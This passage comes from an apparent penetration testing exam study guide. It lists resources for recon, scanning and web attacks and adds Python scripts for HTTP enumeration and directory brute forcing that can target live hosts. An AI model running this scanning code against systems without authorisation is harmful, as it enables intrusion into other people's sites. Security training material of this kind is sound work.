&lt;ul&gt;
  &lt;li&gt;Socat Man Page: &lt;a href=&quot;https://linux.die.net/man/1/socat&quot;&gt;https://linux.die.net/man/1/socat&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;PowerShell and PowerCat:&lt;/p&gt;

&lt;p&gt;PowerShell is a cross-platform scripting language built by Microsoft that is used for task automation and configuration management. PowerShell runs as a shell or command-line environment. Unlike most shells, which accept and return text, PowerShell is built on top of the .NET Common Language Runtime (CLR) and accepts and returns .NET objects. PowerShell is a very powerful tool that pentesters use because it is installed by default on Windows, and it can also be installed on Linux systems.&lt;/p&gt;

&lt;p&gt;Resources to learn more about PowerShell:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;PowerShell Learning Resources: &lt;a href=&quot;https://docs.microsoft.com/en-us/powershell/scripting/learn/more-powershell-learning?view=powershell-7&quot;&gt;https://docs.microsoft.com/en-us/powershell/scripting/learn/more-powershell-learning?view=powershell-7&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;PowerShell for Pentesting In Kali Linux: &lt;a href=&quot;https://www.offensive-security.com/offsec/kali-linux-powershell-pentesting/&quot;&gt;https://www.offensive-security.com/offsec/kali-linux-powershell-pentesting/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Books:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Windows PowerShell CookBook: &lt;a href=&quot;https://www.amazon.com/Windows-PowerShell-Cookbook-Scripting-Microsofts/dp/1449320686&quot;&gt;https://www.amazon.com/Windows-PowerShell-Cookbook-Scripting-Microsofts/dp/1449320686&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Windows PowerShell Reference Book: &lt;a href=&quot;https://www.amazon.com/Windows-PowerShell-Pocket-Reference-Scripters-dp-1449320961/dp/1449320961/&quot;&gt;https://www.amazon.com/Windows-PowerShell-Pocket-Reference-Scripters-dp-1449320961/dp/1449320961/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Learn PowerShell in a Month of Lunches: &lt;a href=&quot;https://www.amazon.com/Learn-Windows-PowerShell-Month-Lunches/dp/1617294160/&quot;&gt;https://www.amazon.com/Learn-Windows-PowerShell-Month-Lunches/dp/1617294160/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Hands on Challenges for learning PowerShell:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;underthewire.tech: &lt;a href=&quot;https://underthewire.tech/wargames.htm&quot;&gt;https://underthewire.tech/wargames.htm&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;codewars: &lt;a href=&quot;https://www.codewars.com/&quot;&gt;https://www.codewars.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;PowerCat: A PowerShell version of netcat. The script can be downloaded onto a Windows target to transfer files, return a shell, or create payloads that call back from the target to our machine. 
&lt;a href=&quot;https://github.com/besimorhino/powercat&quot;&gt;https://github.com/besimorhino/powercat&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;TCPDump: Command-line-based network analysis tool. Very useful and good to know if you are on a system that does not have a GUI. Here is a good cheat sheet I used for tcpdump when I needed to troubleshoot my exploits: &lt;a href=&quot;https://www.andreafortuna.org/technology/networking/tcpdump-a-simple-cheatsheet/&quot;&gt;https://www.andreafortuna.org/technology/networking/tcpdump-a-simple-cheatsheet/&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Daniel Miessler TCPDump Guide: &lt;a href=&quot;https://danielmiessler.com/study/tcpdump/&quot;&gt;https://danielmiessler.com/study/tcpdump/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Wireshark: GUI-based network analysis tool. There are a lot of free PCAP samples online that you can use to understand how Wireshark works. Be careful when downloading some of these PCAP files because they may contain malware; make sure you read where the PCAP is from before playing :D&lt;/p&gt;

&lt;p&gt;PCAP Samples:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Netresec: &lt;a href=&quot;https://www.netresec.com/?page=pcapfiles&quot;&gt;https://www.netresec.com/?page=pcapfiles&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Malware Traffic Analysis: &lt;a href=&quot;https://www.malware-traffic-analysis.net/&quot;&gt;https://www.malware-traffic-analysis.net/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Packettotal (Just like virustotal but for PCAP Analysis): &lt;a href=&quot;https://packettotal.com/&quot;&gt;https://packettotal.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-5-getting-started-with-bash-scripting&quot;&gt;Section 5: Getting Started with Bash Scripting&lt;/h1&gt;

&lt;p&gt;The Bash Guide: A good guide to get you into bash scripting&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://guide.bash.academy/&quot;&gt;https://guide.bash.academy/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Resources to learn more about Bash Scripting:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Tutorials Point: &lt;a href=&quot;https://www.tutorialspoint.com/unix/shell_scripting.htm&quot;&gt;https://www.tutorialspoint.com/unix/shell_scripting.htm&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Codecademy: &lt;a href=&quot;https://www.codecademy.com/learn/bash-scripting/modules/bash-scripting&quot;&gt;https://www.codecademy.com/learn/bash-scripting/modules/bash-scripting&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Example Templates for writing your own Bash Scripts:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://betterdev.blog/minimal-safe-bash-script-template/&quot;&gt;https://betterdev.blog/minimal-safe-bash-script-template/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/ralish/bash-script-template&quot;&gt;https://github.com/ralish/bash-script-template&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-6-passive-reconnaissance&quot;&gt;Section 6: Passive Reconnaissance&lt;/h1&gt;
&lt;p&gt;Take some time to learn about these tricks and techniques. They will certainly come in handy!&lt;/p&gt;

&lt;p&gt;Google Dorks: Crafted Google searches that may expose sensitive information about a target.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Google Hacking Database: &lt;a href=&quot;https://www.exploit-db.com/google-hacking-database&quot;&gt;https://www.exploit-db.com/google-hacking-database&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;SANS Google Dork Cheatsheet: &lt;a href=&quot;https://www.sans.org/security-resources/GoogleCheatSheet.pdf&quot;&gt;https://www.sans.org/security-resources/GoogleCheatSheet.pdf&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Netcraft: &lt;a href=&quot;https://netcraft.com/&quot;&gt;https://netcraft.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Shodan: 
Shodan is a search engine that lets a user find specific types of computers, network devices, webcams, etc. that are connected to the internet, using a set of filters to narrow the results.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Shodan: &lt;a href=&quot;https://www.shodan.io/&quot;&gt;https://www.shodan.io/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Shodan Guide: &lt;a href=&quot;https://leanpub.com/shodan&quot;&gt;https://leanpub.com/shodan&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Shodan CLI: &lt;a href=&quot;https://cli.shodan.io/&quot;&gt;https://cli.shodan.io/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Reviewing Security Headers on Websites:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;OWASP Secure Headers Project: &lt;a href=&quot;https://owasp.org/www-project-secure-headers/&quot;&gt;https://owasp.org/www-project-secure-headers/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Finding Security Headers on websites: &lt;a href=&quot;https://securityheaders.com/&quot;&gt;https://securityheaders.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Email Harvesting:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;theharvester: &lt;a href=&quot;https://github.com/laramies/theharvester&quot;&gt;https://github.com/laramies/theharvester&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Infoga: &lt;a href=&quot;https://github.com/m4ll0k/Infoga&quot;&gt;https://github.com/m4ll0k/Infoga&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;recon-ng: &lt;a href=&quot;https://bitbucket.org/LaNMaSteR53/recon-ng/overview&quot;&gt;https://bitbucket.org/LaNMaSteR53/recon-ng/overview&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Additional Resources: 
Tools I did not use in the lab, but that I used for preparation and that have come in handy on other tests.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Domaintools: &lt;a href=&quot;http://whois.domaintools.com/&quot;&gt;http://whois.domaintools.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;MX Toolbox: &lt;a href=&quot;https://mxtoolbox.com/DNSLookup.aspx&quot;&gt;https://mxtoolbox.com/DNSLookup.aspx&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-7-active-reconnaissance&quot;&gt;Section 7: Active Reconnaissance&lt;/h1&gt;
&lt;p&gt;Introduction to DNS: 
If you do not know what DNS is or how it works, here is a great guide that I used to better understand it from Digital Ocean: 
&lt;a href=&quot;https://www.digitalocean.com/community/tutorials/an-introduction-to-dns-terminology-components-and-concepts&quot;&gt;https://www.digitalocean.com/community/tutorials/an-introduction-to-dns-terminology-components-and-concepts&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you think you have a good understanding of what DNS is then you will also need to understand how to perform forward and reverse lookups. In addition, you should also know how zone transfers work and how to perform them. Performing these tests will certainly help you better understand what your targets are in the lab. For more information about these techniques check out this article here: 
&lt;a href=&quot;https://resources.infosecinstitute.com/dns-enumeration-techniques-in-linux/&quot;&gt;https://resources.infosecinstitute.com/dns-enumeration-techniques-in-linux/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Tools for DNS Enumeration:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Dnsrecon Created by Darkoperator: &lt;a href=&quot;https://github.com/darkoperator/dnsrecon&quot;&gt;https://github.com/darkoperator/dnsrecon&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&quot;network-scanning&quot;&gt;Network Scanning:&lt;/h3&gt;

&lt;p&gt;Nmap: 
A tool that you should 100% totally learn about. You will probably use this every day (if not most of the time while you are in the lab). I highly recommend you take some time to learn what the tool does, how each command switch works, each scanning technique you can run, and any other capabilities. 
Nmap is a powerful tool that has the ability to determine what hosts are online, what services they are running, what operating system is running on that host, and dozens of other characteristics. In addition, one of the most powerful features that you should also learn is the Nmap Scripting Engine (NSE). With NSE scripts you have the ability to automate a wide variety of networking tasks for your scans, including vulnerability detection and exploitation. 
Here are the resources that I used to learn more about Nmap:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Nmap Official Guide: I used this more than the man pages. I highly recommend purchasing the full book since the official guide is missing a few chapters, such as “Detecting and Subverting Firewalls and Intrusion Detection Systems”, “Optimizing Nmap Performance”, “Port Scanning Techniques and Algorithms”, “Host Discovery (Ping Scanning)”, and more. &lt;a href=&quot;https://nmap.org/book/toc.html&quot;&gt;https://nmap.org/book/toc.html&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Link for Nmap Network Scanning Book (if you want to purchase it): &lt;a href=&quot;https://www.amazon.com/Nmap-Network-Scanning-Official-Discovery/dp/0979958717&quot;&gt;https://www.amazon.com/Nmap-Network-Scanning-Official-Discovery/dp/0979958717&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Nmap Scripting Engine (NSE): &lt;a href=&quot;https://nmap.org/book/man-nse.html&quot;&gt;https://nmap.org/book/man-nse.html&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;ZephrFish’s Nmap Blog: &lt;a href=&quot;https://blog.zsec.uk/nmap-rtfm/&quot;&gt;https://blog.zsec.uk/nmap-rtfm/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Masscan: A powerful tool that can be used to scan a set of requested ports against your targets. As Robert Graham says “this can be done in less than 6 minutes at around 10 million packets per second”.&lt;/p&gt;

&lt;p&gt;Daniel Miessler guide to using Masscan: &lt;a href=&quot;https://danielmiessler.com/study/masscan/&quot;&gt;https://danielmiessler.com/study/masscan/&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&quot;service-enumeration&quot;&gt;Service Enumeration:&lt;/h3&gt;
&lt;p&gt;There are a variety of services running on so many systems…take the time to understand them! Do not just scan them and move on. Take some time to look at each of them because they could be a key for you to obtain shell access on a system!&lt;/p&gt;

&lt;p&gt;Abatchy provided a link from 0day security that gave me a lot of ideas and things to look for that I may have missed when I skipped some of the services in the lab. The original link is dead, but you can find copies of it on the Wayback Machine:
&lt;a href=&quot;https://web.archive.org/web/20200309204648/http://0daysecurity.com/penetration-testing/enumeration.html&quot;&gt;https://web.archive.org/web/20200309204648/http://0daysecurity.com/penetration-testing/enumeration.html&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;section-8-vulnerability-scanning&quot;&gt;Section 8: Vulnerability Scanning&lt;/h1&gt;
&lt;p&gt;I did not spend too much time in this section for preparation because vulnerability scanners are simple and easy to configure. In addition, the purpose of a vulnerability scanner is to identify security holes in services or in an operating system. These scanners rely on a database that contains the information needed to conduct a scan. 
A word of caution! Be careful when you use vulnerability scanners on your targets, because there is a chance that some of the plugins or features can impact your target, such as taking down that service, locking out user accounts, or even crashing the system.&lt;/p&gt;

&lt;p&gt;The update replaces OpenVAS, and students will learn how to use Nessus. Nessus is more stable on Kali Linux and it has a simple, straightforward interface. I was also able to use the Nessus Essentials key for most of my testing and to help me get familiar with how these vulnerability scanners work. Nessus is a really popular tool for vulnerability scanning in the infosec world and I certainly encourage you to play with it!&lt;/p&gt;

&lt;p&gt;For instructions on how to install Nessus on Kali Linux you can find it here: 
&lt;a href=&quot;https://www.tenable.com/blog/getting-started-with-nessus-on-kali-linux&quot;&gt;https://www.tenable.com/blog/getting-started-with-nessus-on-kali-linux&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For obtaining a Nessus key you can grab one here: 
&lt;a href=&quot;https://www.tenable.com/products/nessus/nessus-essentials&quot;&gt;https://www.tenable.com/products/nessus/nessus-essentials&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;section-9-web-application-attacks&quot;&gt;Section 9: Web Application Attacks&lt;/h1&gt;

&lt;p&gt;I went back to this section and I really enjoyed how OffSec took the time to go more in-depth on how you should build your web assessment methodology. After all, web apps are showing up more and more often on pentests.&lt;/p&gt;

&lt;p&gt;As a pentester you need to gather information about the web application. For instance you should ask yourself these questions:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;What is the purpose of the application?&lt;/li&gt;
  &lt;li&gt;What language is the web application written in?&lt;/li&gt;
  &lt;li&gt;What version is the web application running?&lt;/li&gt;
  &lt;li&gt;How is the web application being hosted?&lt;/li&gt;
  &lt;li&gt;Does the web application connect to a database? If yes, what database software is it using and what version is it?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Identifying the components of the web application lets you move to the next phase, enumerating the components and issues you identified, instead of running exploits blindly against the application. 
As always, enumeration is something pentesters must keep doing while reviewing every attack avenue that could compromise the web application.&lt;/p&gt;

&lt;p&gt;Things to check for when you are enumerating a web application:&lt;/p&gt;

&lt;p&gt;Reviewing URLs:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;File extensions (.php, .aspx, .jsp and so on tell you the language and platform)&lt;/li&gt;
  &lt;li&gt;Routes and parameters&lt;/li&gt;
  &lt;li&gt;Hidden directories and files (robots.txt and sitemap.xml often list paths the owner did not want crawled; that is hiding, not protection)&lt;/li&gt;
  &lt;li&gt;Services on non-standard ports&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Reviewing the content of the web page:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Always review the source code of the web page, including HTML comments and the JavaScript files it loads!&lt;/li&gt;
  &lt;li&gt;Inspect every element to see how the web app works&lt;/li&gt;
  &lt;li&gt;Review the request and response headers (Server, X-Powered-By, Set-Cookie) to understand how the web application behaves when you perform certain actions against it.&lt;/li&gt;
  &lt;li&gt;Check for admin consoles (for example, WordPress exposes its admin console at /wp-admin/ and its login form at /wp-login.php)&lt;/li&gt;
&lt;/ul&gt;
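
&lt;p&gt;As an added example (not code from the original post), the following Python script pulls those enumeration clues out of a single HTTP response: technology hints from the Server, X-Powered-By and Set-Cookie headers, the language from the file extensions in links and form actions, HTML comments, forms, likely admin paths, and the Disallow entries from robots.txt. The sample response and robots.txt at the bottom are constructed for the demo; the fetch() helper is the only part that touches the network and is meant for an in-scope target.&lt;/p&gt;

```python
"""Extract enumeration clues from an HTTP response (added example).

Works on raw text, so it can be pointed at a response saved from Burp or,
through fetch(), at a live target you are authorised to test.
"""
import re
import urllib.error
import urllib.request
from html.parser import HTMLParser

TECH_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator", "via")
COOKIE_HINTS = {"PHPSESSID": "PHP", "JSESSIONID": "Java servlet container",
                "ASP.NET_SessionId": "ASP.NET", "laravel_session": "Laravel (PHP)",
                "csrftoken": "Django (Python)"}
EXT_HINTS = {".php": "PHP", ".asp": "classic ASP", ".aspx": "ASP.NET",
             ".jsp": "Java (JSP)", ".do": "Java (Struts)", ".cgi": "CGI"}
ADMIN_HINT = re.compile(r"admin|login|manager|console|dashboard|phpmyadmin|wp-", re.I)


class LinkExtractor(HTMLParser):
    """Collects link targets, forms and HTML comments while the body is parsed."""

    def __init__(self):
        super().__init__()
        self.links, self.forms, self.comments = [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("a", "link", "script", "img", "iframe"):
            target = a.get("href") or a.get("src")
            if target:
                self.links.append(target)
        elif tag == "form":
            self.forms.append((a.get("method", "get").upper(), a.get("action", "")))

    def handle_comment(self, data):
        self.comments.append(data.strip())


def parse_raw_response(raw):
    """Split a raw 'status line, headers, blank line, body' response."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body


def analyse(status, headers, body):
    """Return the clues a tester would note down for the next enumeration step."""
    found = {"status": status, "technology": set(), "admin_paths": set()}
    for name in TECH_HEADERS:
        for value in headers.get(name, []):
            found["technology"].add(f"{name}: {value}")
    for cookie in headers.get("set-cookie", []):
        cookie_name = cookie.split("=", 1)[0].strip()
        if cookie_name in COOKIE_HINTS:
            found["technology"].add(f"cookie {cookie_name}: {COOKIE_HINTS[cookie_name]}")
    parser = LinkExtractor()
    parser.feed(body)
    found["links"], found["forms"], found["comments"] = parser.links, parser.forms, parser.comments
    for url in parser.links + [action for _, action in parser.forms]:
        path = url.split("?", 1)[0]
        for ext, tech in EXT_HINTS.items():
            if path.lower().endswith(ext):
                found["technology"].add(f"extension {ext}: {tech}")
        if ADMIN_HINT.search(path):
            found["admin_paths"].add(path)
    return found


def parse_robots(text):
    """Disallow entries from robots.txt: paths the owner hid, not protected."""
    paths = []
    for line in text.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths


def fetch(url, timeout=10):
    """Live helper: GET url, return (status, headers, body); 4xx/5xx are returned, not raised."""
    request = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        response = urllib.request.urlopen(request, timeout=timeout)
    except urllib.error.HTTPError as err:
        response = err
    headers = {}
    for name, value in response.headers.items():
        headers.setdefault(name.lower(), []).append(value)
    return response.getcode(), headers, response.read().decode("utf-8", "replace")


# Constructed sample response and robots.txt (not captured from any real host).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.4.3\r\n"
    "Set-Cookie: PHPSESSID=0123abcd; path=/; HttpOnly\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body><!-- TODO remove /backup/db.sql before go-live -->"
    "<a href='/admin/login.php'>Admin</a>"
    "<form method='post' action='/login.php'><input name='user'></form>"
    "<script src='/static/app.js?v=2'></script></body></html>"
)
SAMPLE_ROBOTS = "User-agent: *\nDisallow: /backup/\nDisallow: /admin/\nAllow: /\n"

if __name__ == "__main__":
    status, headers, body = parse_raw_response(SAMPLE_RESPONSE)
    for key, value in analyse(status, headers, body).items():
        print(f"{key}: {value}")
    print("robots.txt disallows:", parse_robots(SAMPLE_ROBOTS))
```

Every item it reports is a lead, not a finding: the comment points at a backup file to request, the PHP version and Apache version go into searchsploit, and the Disallow paths go straight into the directory scanner.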

&lt;h4 id=&quot;tools-for-finding-web-vulnerabilities-and-conducting-web-attacks&quot;&gt;Tools for finding Web Vulnerabilities and conducting Web Attacks:&lt;/h4&gt;

&lt;h5 id=&quot;web-directory-scanners&quot;&gt;Web Directory Scanners:&lt;/h5&gt;

&lt;p&gt;These tools brute force the structure of a site, its directories and files, using a wordlist. They can identify hidden directory structures or pages that come in handy in the labs or during an assessment. Each tool has its own advantages and disadvantages depending on what you are trying to use it for.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;DIRB: &lt;a href=&quot;http://dirb.sourceforge.net/&quot;&gt;http://dirb.sourceforge.net/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Dirsearch: &lt;a href=&quot;https://github.com/maurosoria/dirsearch&quot;&gt;https://github.com/maurosoria/dirsearch&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Dirbuster: &lt;a href=&quot;https://tools.kali.org/web-applications/dirbuster&quot;&gt;https://tools.kali.org/web-applications/dirbuster&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Gobuster: &lt;a href=&quot;https://github.com/OJ/gobuster&quot;&gt;https://github.com/OJ/gobuster&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Wfuzz: &lt;a href=&quot;https://github.com/xmendez/wfuzz&quot;&gt;https://github.com/xmendez/wfuzz&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;ffuf: &lt;a href=&quot;https://github.com/ffuf/ffuf&quot;&gt;https://github.com/ffuf/ffuf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
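
&lt;p&gt;To show what these scanners do under the hood, here is an added example (not code from the original post or from any of the tools above) of a small gobuster/ffuf-style brute forcer in Python: it expands each wordlist entry with a trailing slash and a set of extensions, probes with a thread pool, keeps only interesting status codes, and first requests a random name to learn what “not found” looks like on this site, so that a catch-all page does not turn every word into a hit. FAKE_SITE is a constructed stand-in used when the script is run without an argument; pass a real (and in-scope) base URL to run it over the network.&lt;/p&gt;

```python
"""Minimal directory brute forcer with soft-404 filtering (added example)."""
import concurrent.futures
import sys
import urllib.error
import urllib.request
import uuid

INTERESTING = (200, 204, 301, 302, 307, 401, 403)


def http_probe(url, timeout=10):
    """GET url and return (status, body_length); 4xx/5xx are results, not errors."""
    request = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status, len(response.read())
    except urllib.error.HTTPError as err:
        return err.code, len(err.read())
    except urllib.error.URLError:
        return None, 0


def candidates(words, extensions):
    """word, word/ and word.ext for every wordlist entry (blank and # lines skipped)."""
    for word in words:
        word = word.strip()
        if not word or word.startswith("#"):
            continue
        yield word
        yield word + "/"
        for ext in extensions:
            yield word + "." + ext.lstrip(".")


def scan(base_url, words, extensions=(), probe=http_probe, threads=10):
    """Return {path: (status, length)} for every hit that is not a soft 404."""
    base_url = base_url.rstrip("/")
    # Baseline: a name that cannot exist shows what this site returns for
    # unknown paths (a real 404, or a 200 catch-all page of a fixed size).
    nf_status, nf_length = probe(base_url + "/" + uuid.uuid4().hex)

    def check(name):
        status, length = probe(base_url + "/" + name)
        return name, status, length

    hits = {}
    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as pool:
        for name, status, length in pool.map(check, candidates(words, extensions)):
            if status not in INTERESTING:
                continue
            if status == nf_status and length == nf_length:
                continue  # identical to the random-name response: soft 404
            hits["/" + name] = (status, length)
    return hits


# Constructed stand-in for a target (no real host): unknown paths get a 200
# catch-all page of 512 bytes, the soft-404 behaviour that fools naive scanners.
FAKE_SITE = {
    "/": (200, 1200),
    "/index.php": (200, 1200),
    "/admin": (301, 0),
    "/admin/": (301, 0),
    "/backup.zip": (200, 98304),
    "/config.php": (403, 300),
}
WORDS = ["admin", "backup", "config", "index", "uploads", "# comment", ""]
EXTENSIONS = ("php", "zip")


def fake_probe(url):
    """Probe function that answers from FAKE_SITE instead of the network."""
    path = url.split("://", 1)[1]
    path = path[path.find("/"):]
    return FAKE_SITE.get(path, (200, 512))


if __name__ == "__main__":
    if len(sys.argv) == 2:
        target, prober = sys.argv[1], http_probe   # python3 dirbust.py http://target
    else:
        target, prober = "http://target.example", fake_probe
    for path, (status, length) in sorted(scan(target, WORDS, EXTENSIONS, probe=prober).items()):
        print(f"{status} {length:8d} {path}")
```

The real tools add recursion, rate limiting and smarter filters (ffuf filters on size, word count and regex), but the baseline request is the piece most worth understanding: without it a site that answers 200 to everything looks like a site where every word exists.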

&lt;h5 id=&quot;burpsuite&quot;&gt;BurpSuite:&lt;/h5&gt;

&lt;p&gt;A popular web application testing platform built around an intercepting proxy. You point your browser at the Burp proxy listener, and once the proxy is configured you can capture and analyze every request to and from the target web application. With the captured requests a penetration tester can analyze, manipulate, replay, and fuzz individual HTTP requests (Repeater and Intruder) to identify parameters or injection points manually. Extensions add further checks, and the Professional edition adds an automated vulnerability scanner that the free Community edition does not have.&lt;/p&gt;

&lt;p&gt;BurpSuite Resources:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Burp Training from Secure Ideas: &lt;a href=&quot;https://www.youtube.com/playlist?list=PLqG-wtrX3aA_wYTrnDHoCBkKBoI4z9oLd&quot;&gt;https://www.youtube.com/playlist?list=PLqG-wtrX3aA_wYTrnDHoCBkKBoI4z9oLd&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Bugcrowd University has a webinar that Jason Haddix created explaining about burp suite and how you can use it. You can find this recording here: &lt;a href=&quot;https://www.bugcrowd.com/resource/introduction-to-burp-suite/&quot;&gt;https://www.bugcrowd.com/resource/introduction-to-burp-suite/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h5 id=&quot;nikto-created-by-chris-sullo--tautology0&quot;&gt;Nikto (Created by Chris Sullo &amp;amp; tautology0):&lt;/h5&gt;

&lt;p&gt;A web server scanner that performs comprehensive tests against web servers for multiple items. It checks for known vulnerable files and scripts, reviews server configuration such as multiple index files and HTTP server options, and attempts to identify the installed web server version and any plugins or software running on it. Keep in mind that this tool is very noisy when it scans a target’s web server.&lt;/p&gt;

&lt;p&gt;Link: &lt;a href=&quot;https://cirt.net/Nikto2&quot;&gt;https://cirt.net/Nikto2&lt;/a&gt;&lt;/p&gt;

&lt;h5 id=&quot;httpie-httpshttpieio&quot;&gt;HTTPie &lt;a href=&quot;https://httpie.io/&quot;&gt;https://httpie.io/&lt;/a&gt;:&lt;/h5&gt;

&lt;p&gt;A command-line HTTP client designed for testing, debugging, and generally interacting with APIs &amp;amp; HTTP servers. The &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;http&lt;/code&gt; &amp;amp; &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;https&lt;/code&gt; commands let you build and send arbitrary HTTP requests with a much shorter syntax than curl.&lt;/p&gt;

&lt;h5 id=&quot;exploiting-common-web-based-vulnerabilities&quot;&gt;Exploiting common Web-based Vulnerabilities:&lt;/h5&gt;

&lt;h5 id=&quot;exploiting-admin-consoles&quot;&gt;Exploiting Admin Consoles:&lt;/h5&gt;

&lt;p&gt;When an administrative login panel is left exposed it becomes significantly easier for attackers to compromise that site, depending on the security controls and permissions the developers have implemented. 
As pentesters we can use techniques such as brute forcing, signing in with compromised or default credentials, or, on unpatched systems, exploiting the administration login page itself (an authentication bypass).&lt;/p&gt;

&lt;p&gt;If you would like to see some examples, you can find many write-ups of this kind on the Exploit Database: &lt;a href=&quot;https://www.exploit-db.com/search?q=Authentication+Bypass&quot;&gt;https://www.exploit-db.com/search?q=Authentication+Bypass&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Exploit Examples:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;CASAP Automated Enrolment System: &lt;a href=&quot;https://www.exploit-db.com/exploits/49463&quot;&gt;https://www.exploit-db.com/exploits/49463&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Online Hotel Reservation System 1.0: &lt;a href=&quot;https://www.exploit-db.com/exploits/49420&quot;&gt;https://www.exploit-db.com/exploits/49420&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Alumni Management System 1.0: &lt;a href=&quot;https://www.exploit-db.com/exploits/48883&quot;&gt;https://www.exploit-db.com/exploits/48883&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Other common web vulnerability classes, with a reference for each:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Cross-site scripting (XSS). OWASP: &lt;a href=&quot;https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)&quot;&gt;https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)&lt;/a&gt;&lt;/li&gt;
